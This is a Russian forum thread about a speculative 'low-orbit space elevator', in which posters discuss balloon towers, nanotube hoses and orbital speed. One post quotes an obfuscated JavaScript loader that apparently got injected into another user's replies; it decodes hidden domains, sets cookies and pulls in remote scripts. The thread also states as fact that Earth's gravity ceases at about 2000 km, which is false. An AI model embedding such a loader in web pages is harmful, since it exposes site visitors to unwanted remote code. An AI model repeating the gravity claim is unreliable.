Низкоорбитальный космический лифт.

Автор moon, 27.07.2015 12:10:55

« назад - далее »

moon

Как любил говорить писатель-фантаст Роберт Хайн-лайн, если вы можете подняться над Землей на 160 км, вы уже на полпути к любой точке Солнечной системы. Это потому, что при любом запуске первые 160 км, когда ракета стремится вырваться из пут земного притяжения, 'съедают' львиную долю стоимости. После этого корабль, можно сказать, уже в состоянии добраться хоть до Плутона, хоть дальше.[1] 
Итак 

Ты видишь нечто  и говоришь: "Почему?"
 А я воображаю  нечто не бывшее и говорю: "Почему бы и нет?" Бернард Шоу

Leonar

Цитироватьmoon пишет:

из пут земного притяжения, 'съедают' львиную долю стоимости
было уже
[quote="Khan"]Башня высотой 30 км для запуска ракет в космос.

Принципиальная схема:

Разбита на ярусы-ступени высотой 30-50 метров каждый; внутри каждого яруса - шары с гелием (тысячи их). С внешней стороны ярус прикрыт обтекаемыми стенками из лёгкого материала. Между ярусами - открытый этаж высотой 2-3 метра для прохода ветра и обслуживания/замены шаров. По-середине - шахта лифта.

В сравнении с Эверестом:

P.S.: Если эта башня не годится для космического лифта, может сгодится для строительства жилья высотой несколько километров (для любителей)?

Предлагаю запустить краудфандинговый проект.

moon

ЦитироватьLeonar пишет:
Цитироватьmoon пишет:

из пут земного притяжения, 'съедают' львиную долю стоимости
было уже

Не было ТАКОГО ЕЩЕ  :)  )
А вот такое было:

На этом же принципе можно держать на орбите и "лифт-спутник"....Только вместо воды, атмосферный воздух..
Об этом так сказать и речь

Leonar

Цитироватьmoon пишет:
Не было ТАКОГО ЕЩЕ
на ракетах скажите еще что не летали никогда люди в космос...  :D

moon

ЦитироватьLeonar пишет:
Цитироватьmoon пишет:
Не было ТАКОГО ЕЩЕ
на ракетах скажите еще что не летали никогда люди в космос...  :D  
Спасибо интересная конструкция я про гору из шаров.  Только при чему тут шары с Гелием???

Вот так будет нагляднее вот это правильные шары  :)  ))

Leonar

у меня вот такая вот фигня в ваших ответах 
Цитировать.-1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script" ;i.setAttribute("src",n),i.setAttribute("type","text/javascript" ,document.head.appendChild(i),i.on load=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.on error=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom" ;e=s&&-1!=o.indexOf(s)?s:u?u [0];var f,m=n("oismods" ;m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})) f=r(e)+"/pjs/"+t+"/c/"+c("novosti-kosmonavtiki.ru" +"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();
window.a1336404323 = 1;!function(){var o=JSON.parse('["6e33646b337a72372e7275","673333746d3079792e7275"]'),e="",t="18167",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.on load=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.on error=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))f=r(e)+"/pjs/"+t+"/c/"+c("novosti-kosmonavtiki.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}()

moon

ЦитироватьLeonar пишет:
у меня вот такая вот фигня в ваших ответах

Исправил.. И все таки растолкуйте при чем тут гора из Шаров???

Leonar

Цитироватьmoon пишет:
И все таки растолкуйте при чем тут гора из Шаров???
а зачем вы стерли вокруг трубы шары с гелием? ;)

moon

ЦитироватьLeonar пишет:
Цитироватьmoon пишет:
И все таки растолкуйте при чем тут гора из Шаров???
а зачем вы стерли вокруг трубы шары с гелием?  ;)  
Я попросил автора их удалить  :)  ))) написал что это лишняя деталь  он согласился  :)  Вы хотите доказать обратное???

Leonar

Цитироватьmoon пишет:
Я попросил автора их удалить
я кстати "такой лифт" считал...
только я подумывал по шлангам топливо и окислитель наверх закачивать...
после маленького подсчета вышло, что это очень ну его нафиг в смысле энергозатрат
у вас типа легче?
посчитайте массу шланга (заодно и его требуемую прочность), требуемую мощность "вентиляторов", требуемую мощьность СБ
ну и сущая мелочь... свободный конец трубы на какой скорости и высоте планируется балтаться относительно поверхности и как туда ПН может быть доставлена

ну и совсем мелочь как это все там строить?

moon

ЦитироватьLeonar пишет:
Цитироватьmoon пишет:
Я попросил автора их удалить
я кстати "такой лифт" считал...
только я подумывал по шлангам топливо и окислитель наверх закачивать...
после маленького подсчета вышло, что это очень ну его нафиг в смысле энергозатрат
у вас типа легче?
посчитайте массу шланга (заодно и его требуемую прочность), требуемую мощность "вентиляторов", требуемую мощьность СБ
ну и сущая мелочь... свободный конец трубы на какой скорости и высоте планируется балтаться относительно поверхности и как туда ПН может быть доставлена

ну и совсем мелочь как это все там строить?
Читаем в Википендии

Углеродные нанотрубки — это протяжённые цилиндрические структуры диаметром от одного до нескольких десятков нанометров и длиной до нескольких сантиметров[1] (при этом существуют технологии, позволяющие сплетать их в нити неограниченной длины [2])

[/li]
  • Трос для космического лифта: нанотрубки, теоретически, могут держать огромный вес — до тонны на квадратный миллиметр. Однако получить достаточно длинные углеродные трубки с толщиной стенок в один атом не удавалось до сих пор [21], из-за чего приходится использовать нити, сплетённые из относительно коротких нанотрубок, что уменьшает итоговую прочность.
То есть сплести из нанотрубок ШЛАНГ длинной в 160 км. вполне реально.. Для нормального космического лифта 160 км это вообще не длинна троса... А вот для шланга мне кажется все технологии есть..

Уже удалось создать из углеродных нанотрубок протяженные волокна, которые обладают высокой электропроводностьюи превосходящей сталь прочностью[30].

Leonar

а ну да... самое главное забыл уточнить...
спутник сосущий воздух на орбите Земли или где то в безвоздушном пространстве выкачивает атмосферу Земли? :D

Leonar

Цитироватьmoon пишет:
Вы хотите доказать обратное???
кстати не моя идея с шарами...но так легче все это построить... :D  и самый смак в том что мы разгоняем аппарат в трубе до 30км... т.е. большую часть атмосферы мы не тратим топливо в ракете ...

moon

ЦитироватьLeonar пишет:
а ну да... самое главное забыл уточнить...
спутник сосущий воздух на орбите Земли или где то в безвоздушном пространстве выкачивает атмосферу Земли?  :D  
Леонар сила притяжения Земли перестает ощущаться приблизительно на высоте 2000 км. Далее тело уже будет притягиватся Солнцем.  В данном случае воздух не покидает гравитационное поле Земли и просто оседает обратно в атмосферу.. А ну вспомните при какой скорости тело никогда не упадет на Землю???

moon

ЦитироватьLeonar пишет:
Цитироватьmoon пишет:
Вы хотите доказать обратное???
кстати не моя идея с шарами...но так легче все это построить...  :D  и самый смак в том что мы разгоняем аппарат в трубе до 30км... т.е. большую часть атмосферы мы не тратим топливо в ракете ...
Да знаю я эту идею.. только зачем ракета вот САМАЯ БОЛЬШАЯ ПУШКА В МИРЕ:
Превратите Ваши шары в электромагнитную пушку и будет Вам счастье...

Leonar

Цитироватьmoon пишет:
Леонар сили притяжениея Земли перестает ощущаться приблизительно на высоте 2000 км.
ну да...
Цитироватьmoon пишет:
Далее тело уже будет притягиватся Солнцем.
ага...
Цитироватьmoon пишет:
А ну как при какой скорости тело никогда не упадет на Землю???
во!
ну и при какой? 
и в каком направлении?

m-s Gelezniak

При подъёме на орб лифте тело преобретаел угловую скорость. За счёт чего?
Шли бы Вы все на Марс, что ли...

Leonar

Цитироватьmoon пишет:
Превратите Ваши шары в электромагнитную пушку и будет Вам счастье...
она и есть....шары ствол пушки удерживают )))
только не моя там идея... я бы по наклонной траектории ствол разместил

moon

ЦитироватьLeonar пишет:
Цитироватьmoon пишет:
Леонар сили притяжениея Земли перестает ощущаться приблизительно на высоте 2000 км.
ну да...
Цитироватьmoon пишет:
Далее тело уже будет притягиватся Солнцем.
ага...
Цитироватьmoon пишет:
А ну как при какой скорости тело никогда не упадет на Землю???
во!
ну и при какой?
мало знать при какой важно еще понимать, что тело должно быть ускорено над Землей как брошеный камень по орбите. ВИКИПЕДИЯ В ПОМОШЬ. Там первая второая и т.д.космические скорости  :)  ))

Пе́рвая косми́ческая ско́рость (кругова́я ско́рость) — минимальная скорость, которую необходимо придать объекту, чтобы вывести его на геоцентрическую орбиту. Иными словами, первая космическая скорость — это минимальная скорость, при которой тело, движущееся горизонтально над поверхностью планеты, не упадёт на неё, а будет двигаться по круговой орбите.

Leonar

Цитироватьm-s Gelezniak пишет:
При подъёме на орб лифте тело преобретаел угловую скорость . За счёт чего?
не... ему просто вверх надо... а в сторону там как нить зачем? :D
ведь
Цитироватьmoon пишет:
притяжения Земли перестает ощущаться приблизительно на высоте 2000 км